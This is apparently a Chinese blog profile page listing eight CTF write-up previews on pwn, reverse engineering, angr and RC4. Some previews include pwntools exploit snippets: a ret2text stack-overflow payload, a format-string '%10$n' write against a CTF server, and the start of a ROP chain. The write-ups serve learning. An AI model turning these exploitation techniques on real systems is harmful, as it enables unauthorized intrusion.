- 博客(8)
- 收藏
- 关注
原创 2021工业信息安全大赛第三场--工控逆向分析
考完试打个比赛,tctf不会(tcl),打个工控结果只有一道逆向,前几场好像多几道,麻了这道题主要是反调麻烦,加密倒挺简单的把下面两个地方patch成noppatch之后就可以正常调试了注意到下面这里调试后可以看出到这里是最后的比较结果加密就是一个异或,key在下面src=[0xC8, 0xA6,0x87,0xEF,0xB6,0xC4,0xFA,0xFE,0xB0,0xC4,0xEC,0x80,0xD6,0xC7,0xAA,0xE4]c=[0x85,0x97,0xaa,0xb5]s
2021-07-05 00:13:18
930
原创 ctfshow 基础pwn wp
PWN01简单栈溢出,ret2textfrom pwn import *#p = process("./pwn1")p = remote(ip,port)p.recv()payload = 'a'*(0x9+4) + p32(0x0804850F)p.sendline(payload)p.interactive()PWN0332为程序,栈溢出,无system,ret2libc,32位程序通过栈传参from pwn import *from LibcSearcher import *
2021-05-29 00:05:36
796
原创 buu [第五空间2019 决赛]PWN5 wp
存在格式化字符串漏洞经过尝试发现偏移为10from pwn import *addr=0x804c044p=remote("node3.buuoj.cn",29172)#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数#即 mov [%10$n] , 字符数 payload=p32(addr)+"%10$n"p.sendline(payload)#p32写入的字符数是4p.sendline("4")p.interactive()...
2021-05-02 21:16:31
258
原创 buuctf ciscn_2019_c_1 wp
记录下学习pwn的过程(感觉比re难多了,我太菜了)查看保护64位程序,64位程序 的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9,多的参数再通过栈传递在encrypt函数里使用了gets函数,可能有栈溢出发现对输入进行了加密可以使用“\0”绕过构造rop链,需要使用到rdi传递参数,又因为是ubuntu18所以需要栈对齐,使用到一个retfrom pwn import *from LibcSearcher import *p=remote("node
2021-05-02 20:44:02
430
原创 2021[HFCTF]虎符杯网络安全赛道re部分wp
CrackMe这题是使用c++写的,因为无符号表,ida对c++的解析不是很友好,可以去了解一下c++的string类型的结构,对解题很有帮助,推荐看这篇文章链接: https://bbs.pediy.com/thread-230312.htm.程序先将长度为17位的输入分为7位和10位两部分再输入一个数要求满足一定条件直接爆破#include <stdio.h>#include <stdlib.h>#include <math.h>double f
2021-04-07 19:25:06
1395
6
原创 DASCTF3月赛re部分wp
做出两道re,被大佬们带躺了个12Enjoyit-1这题送分题.net程序,用dnspy反编译,主要逻辑如下b.b检查输入是否在’_'和’z’之间b.c是一个改表base64写脚本解出符合条件的输入import base64src='abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ='aaa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
2021-03-27 22:37:09
479
3
原创 符号执行angr安装与使用
简介angr是ctf中最常用的符号执行架构,支持x86,x86-64,ARM,AARCH64,MIPS,MIPS64,PPC,PPC64等多种架构,这里记录一下我对angr使用的学习过程安装因为angr对某些库如z3进行了一定的改动,所以推荐将其安装在虚拟环境virtualenvwrapper中安装 virtualenvwrapper#1安装环境:~$ sudo apt-get install python-dev libffi-dev build-essential virtualenvwra
2021-02-19 18:41:35
1146
原创 RC4加密原理及其弱密钥推导
RC4简介rc4加密由Ron Rivest 于1987年为RSA Security公司设计,是一种可变密钥长度,面向字节的流密码 ,广泛应用于 web SSL/TLS, wireless WEP/WPA等1.RC4算法原理用一个长度为1到256个字节(8~2048位)的可变长度密钥来初始化一个256个字节的状态向量S,S的元素记为S[0],S[1],…S[255],从始至终S包含所有从0到255的数字a.RC4密钥调度首先初始化状态向量S[i],同时由可变密钥K生成中间向量T/* 初始
2020-09-01 22:16:24
3687
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人